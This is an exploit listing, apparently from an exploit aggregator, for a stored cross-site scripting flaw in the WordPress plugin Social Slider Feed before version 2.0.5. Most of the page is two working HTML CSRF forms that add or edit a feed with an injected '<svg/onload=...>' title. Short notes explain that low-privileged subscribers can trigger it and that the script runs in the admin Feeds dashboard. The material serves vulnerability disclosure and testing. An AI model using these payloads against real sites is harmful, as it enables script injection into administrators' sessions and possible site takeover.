Exploit for Social Slider Feed < 2.0.5 - Subscriber+ Stored XSS via Feeds

Name: Exploit for Social Slider Feed < 2.0.5 - Subscriber+ Stored XSS via Feeds
Rating: 5 (65 reviews)
2022-08-01 | CVSS -0.5
## https://sploitus.com/exploit?id=WPEX-ID:24AB2998-9FAF-46CA-9A80-F78136653DA0
As any authenticated user, such as subscriber. Or via CSRF against them

<html>
  <body>
    <form action="http://example.com/wp-admin/admin.php?page=feeds-wisw&social=instagram&action=add" method="POST">
      <input type="hidden" name="title" value='Social Slider"><svg/onload=alert(/XSS/)>' />
      <input type="hidden" name="search_for" value="hashtag" />
      <input type="hidden" name="username" value="" />
      <input type="hidden" name="hashtag" value="a" />
      <input type="hidden" name="blocked_users" value="" />
      <input type="hidden" name="refresh_hour" value="5" />
      <input type="hidden" name="images_number" value="20" />
      <input type="hidden" name="caption_words" value="20" />
      <input type="hidden" name="orderby" value="rand" />
      <input type="hidden" name="images_link" value="image_link" />
      <input type="hidden" name="custom_url" value="" />
      <input type="hidden" name="blocked_words" value="" />
      <input type="hidden" name="allowed_words" value="" />
      <input type="hidden" name="template" value="slider" />
      <input type="hidden" name="columns" value="4" />
      <input type="hidden" name="gutter" value="0" />
      <input type="hidden" name="masonry_image_width" value="200" />
      <input type="hidden" name="masonry_lite_cols" value="4" />
      <input type="hidden" name="masonry_lite_gap" value="10" />
      <input type="hidden" name="slick_img_size" value="300" />
      <input type="hidden" name="slick_slides_to_show" value="3" />
      <input type="hidden" name="slick_sliding_speed" value="5000" />
      <input type="hidden" name="highlight_offset" value="1" />
      <input type="hidden" name="highlight_pattern" value="6" />
      <input type="hidden" name="shopifeed_phone" value="" />
      <input type="hidden" name="shopifeed_color" value="#da004a" />
      <input type="hidden" name="shopifeed_columns" value="3" />
      <input type="hidden" name="controls" value="prev_next" />
      <input type="hidden" name="animation" value="slide" />
      <input type="hidden" name="slidespeed" value="7000" />
      <input type="hidden" name="wis-feed-save-action" value="Save" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

<html>
  <body>
    <form action="https://example.com/wp-admin/admin.php?page=feeds-wisw&social=instagram&feed=4&action=edit" method="POST">
      <input type="hidden" name="title" value='Sub"><svg/onload=alert(/XSS/)>' />
      <input type="hidden" name="search_for" value="hashtag" />
      <input type="hidden" name="username" value="" />
      <input type="hidden" name="hashtag" value="" />
      <input type="hidden" name="blocked_users" value="" />
      <input type="hidden" name="refresh_hour" value="5" />
      <input type="hidden" name="images_number" value="20" />
      <input type="hidden" name="caption_words" value="20" />
      <input type="hidden" name="orderby" value="rand" />
      <input type="hidden" name="images_link" value="image_link" />
      <input type="hidden" name="custom_url" value="" />
      <input type="hidden" name="blocked_words" value="" />
      <input type="hidden" name="allowed_words" value="" />
      <input type="hidden" name="template" value="slider" />
      <input type="hidden" name="columns" value="4" />
      <input type="hidden" name="gutter" value="0" />
      <input type="hidden" name="masonry_image_width" value="200" />
      <input type="hidden" name="masonry_lite_cols" value="4" />
      <input type="hidden" name="masonry_lite_gap" value="10" />
      <input type="hidden" name="slick_img_size" value="300" />
      <input type="hidden" name="slick_slides_to_show" value="3" />
      <input type="hidden" name="slick_sliding_speed" value="5000" />
      <input type="hidden" name="highlight_offset" value="1" />
      <input type="hidden" name="highlight_pattern" value="6" />
      <input type="hidden" name="shopifeed_phone" value="" />
      <input type="hidden" name="shopifeed_color" value="#da004a" />
      <input type="hidden" name="shopifeed_columns" value="3" />
      <input type="hidden" name="controls" value="prev_next" />
      <input type="hidden" name="animation" value="slide" />
      <input type="hidden" name="slidespeed" value="7000" />
      <input type="hidden" name="wis-feed-save-action" value="Save" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

Despite the "Sorry, you are not allowed to access this page." error, the feed will be added/edited

The XSS will be triggered when editing the feed again, as well as in the Feeds dashboard (/wp-admin/admin.php?page=feeds-wisw)